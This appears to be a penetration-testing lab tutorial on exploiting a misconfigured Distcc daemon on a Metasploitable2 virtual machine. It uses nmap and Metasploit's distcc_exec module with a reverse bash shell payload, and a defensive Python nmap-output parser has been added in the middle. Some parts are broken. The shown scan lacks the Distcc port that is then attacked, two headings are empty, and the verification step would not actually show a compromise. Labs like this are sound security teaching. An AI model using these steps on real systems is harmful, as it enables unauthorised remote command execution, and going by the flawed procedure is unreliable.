Attacking Distcc to Gain Privileges


Introduction

In this lab, we will be conducting penetration testing on the Metasploitable2 target machine provided by LabEx using the Kali terminal. The focus will be on understanding the principles and process of attacking the Distcc service. At the end of the lab, recommended readings and homework assignments are provided.



Start the Lab Environment

  1. Open an xfce terminal on the LabEx host machine and start the Metasploitable2 target by running the following command:

sudo virsh start Metasploitable2

  2. Test the connectivity to the target machine by pinging it:

ping 192.168.122.102

Press Ctrl+C to stop the ping.

  3. Launch the Kali Linux container and enter the bash environment by running:

docker run -ti --network host b5b709a49cd5 bash

  4. Inside the Kali container, test the network connection to the target machine:

ping 192.168.122.102

Press Ctrl+C to stop the ping.

Now both the attack machine and the target machine are running, and you can start the penetration testing.

Note: If you accidentally exit the current bash, the Kali container will automatically stop. You can execute docker run -ti --network host b5b709a49cd5 bash again on the host to start a new Kali container and enter bash to continue the experiment.

Perform Penetration Testing

The Distcc service vulnerability principle:

Distcc is used for distributed compilation of large codebases across network servers. If it is misconfigured, it can be abused to execute commands. The weakness exists in Distcc 2.x (as shipped with XCode 1.5 and other software) because access to the server port is not restricted to trusted clients.

In simple terms, the daemon does not check who connects to its port or what the submitted task runs, so an attacker can use the distributed compilation tasks to execute their own commands.

Vulnerability indexes:

Vulnerability attack module code:

First, start msfconsole to enter the operation interface:

cd ~
msfconsole

Use the Nmap scanning tool to scan the target host for open ports:

nmap -sV -T4 192.168.122.102

Here's an example of the output you might see:

[*] exec: nmap -sV -T4 192.168.122.102

Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-30 21:51 UTC
Nmap scan report for 192.168.122.102
Host is up (0.0075s latency).
Not shown: 996 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
53/tcp   open  domain  ISC BIND 9.4.2
111/tcp  open  rpcbind 2 (RPC #100000)
3306/tcp open  mysql   MySQL 5.0.51a-3ubuntu5
MAC Address: 52:54:00:1E:9E:B4 (QEMU virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.41 seconds
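The scan output above is Nmap's normal output format, and the exposure it can reveal is exactly the root cause described in the vulnerability principle: a distccd port reachable from untrusted clients. The following is an added example, not part of the lab or of Metasploit, that parses that output format and flags an exposed distcc service; the sample scan text is constructed (modelled on the lab's output with a distccd line added), and the RISKY_SERVICES table is an assumption chosen for this example.

```python
import re
from typing import Dict, List, NamedTuple


class Service(NamedTuple):
    port: int
    proto: str
    state: str
    name: str
    version: str


# One line per port in Nmap's normal output, e.g.
# "3632/tcp open  distccd distccd v1 ((GNU) 4.2.4 ...)"
_PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<name>\S+)\s*(?P<version>.*)$"
)

# Assumed table for this example: services that should never face an untrusted
# network. distccd is the case discussed above: without a client restriction
# (distccd's --allow option), any host can submit compile jobs to it.
RISKY_SERVICES: Dict[int, str] = {
    3632: "distccd accepts compile jobs from any host unless --allow restricts clients",
}


def parse_nmap_output(text: str) -> List[Service]:
    """Extract the port table rows from `nmap -sV` normal output."""
    services = []
    for line in text.splitlines():
        m = _PORT_LINE.match(line.strip())
        if m:  # header, host and summary lines do not match
            services.append(Service(int(m["port"]), m["proto"], m["state"],
                                    m["name"], m["version"].strip()))
    return services


def flag_exposed(services: List[Service]) -> List[str]:
    """Return one finding per open port that is in the risky-service table."""
    return [f"{s.port}/{s.proto} {s.name}: {RISKY_SERVICES[s.port]}"
            for s in services if s.state == "open" and s.port in RISKY_SERVICES]


# Constructed sample scan text (not real scan output).
SAMPLE_SCAN = """\
Nmap scan report for 192.168.122.102
Host is up (0.0075s latency).
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
3306/tcp open  mysql   MySQL 5.0.51a-3ubuntu5
3632/tcp open  distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu3))
"""

if __name__ == "__main__":
    for finding in flag_exposed(parse_nmap_output(SAMPLE_SCAN)):
        print("EXPOSED:", finding)
```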

Based on the scan results, search for the module corresponding to the port service you want to attack:

search distcc

In the Kali MSF terminal, use the use command to select the appropriate module:

use exploit/unix/misc/distcc_exec

Then, use the show options command to display the module parameters:

show options

Here's an example of the output you might see:

Module options (exploit/unix/misc/distcc_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasplo
                                       it.html
   RPORT    3632             yes       The target port (TCP)


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.28.140.88    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

Set the target host parameter RHOST to 192.168.122.102:

set RHOST 192.168.122.102

Once everything is set, use the exploit command to attack the host:

exploit

Press Ctrl+D to quit the Metasploit console, then start the inspection.

Verify Successful Penetration

To verify whether the penetration was successful, use the following commands: whoami, hostname, and ifconfig (to check the IP address).

First, if you are not in the Metasploit console, start it:

cd ~
msfconsole

Check the current user:

whoami

Check the hostname:

hostname

Check the IP address of the compromised host:

ifconfig

If the hostname and IP address match the target machine (192.168.122.102), it indicates that the penetration test was successful.

Press Ctrl+D to quit the Metasploit console, then start the inspection.

Summary

In this lab, we learned about the principles and process of attacking the Distcc service. We gained hands-on experience with Nmap port and service scanning, using Metasploit to exploit the Distcc vulnerability, and verifying successful penetration. The lab provided a practical understanding of vulnerability analysis and exploitation techniques.
